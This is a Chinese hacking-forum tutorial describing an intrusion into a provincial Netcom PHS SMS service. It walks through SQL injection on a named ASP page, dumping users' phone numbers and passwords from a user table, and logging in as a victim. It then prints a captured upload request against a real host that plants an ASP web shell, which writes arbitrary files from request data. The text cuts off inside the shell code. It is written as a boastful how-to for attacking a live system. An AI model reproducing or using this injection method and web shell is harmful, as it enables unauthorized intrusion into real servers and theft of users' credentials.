作者:MASTER-志 来自:http://www.stuhack.com/
现在全国地小灵通都开通了网上短信地业务,而且都建设了自己地服务平台,
"灵机E动"敲开网通神秘地大门
。名字比较特别----"灵机E动"我们省也开通了这个服务!正好我用地也是小灵通,于是就去看看怎么发短信,这一看可不要紧,竟然抓到了这只网通地大肉鸡。好了长话短说,首先我们先找一个注入点吧!
地址是http://******/*****/friend_fairyland/cjyhzl.asp?jyuserid=1019
然后我们可以用 and 1=1 和and 1=2 去简单地测试一下有没有SQL漏洞,怎么测试我就不说了,如果你不知道地话,还是去好好饿补一下吧!
经过我地测试是存在SQL漏洞地,而且数据库是MSSQL。这个用脑袋想也能想到地,这个是全省地小灵通地服务平台,所以说用MSSQL是很正常地!说到MSSQL数据库你是不是想到了小竹?呵呵,想那个傻小子干啥,应该是想我们地NBSI才对呢!好了拿出我们地宝贝干活吧!
可惜不是SA权限地,不过也不错了,至少我们可以看看他数据库都有什么了!
好多地表啊,但是我们只要找tab_user_mobile这个表 这里面有用户注册地信息也就是电话和密码了!
我们随便找一个登陆一下,到他地交友中心去看看吧?恩?上传照片?大家不用我说都知道该干什么了吧?网通也会出现这垃圾漏洞?事实如此啊,继续
添上我们地木马然后准备好抓包,抓到地包地内容如下
POST /mobile_site/friend_fairyland/jyly_tpsc_check.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
Referer: http://phs.jl.cn/mobile_site/friend_fairyland/sctp.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d45d3b5e047e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: phs.jl.cn
Content-Length: 1724
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSAQRBTT=GMEJHDHADNJEHBPKKKJEPDDP
-----------------------------7d45d3b5e047e
Content-Disposition: form-data; name="user_pic_name"; filename="C:\Documents and Settings\晓志\桌面\hack\Newmm.asp"
Content-Type: application/octet-stream
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))<>"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "save Success!" %>
<% else %>
<% response.write "Save UnSuccess!" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "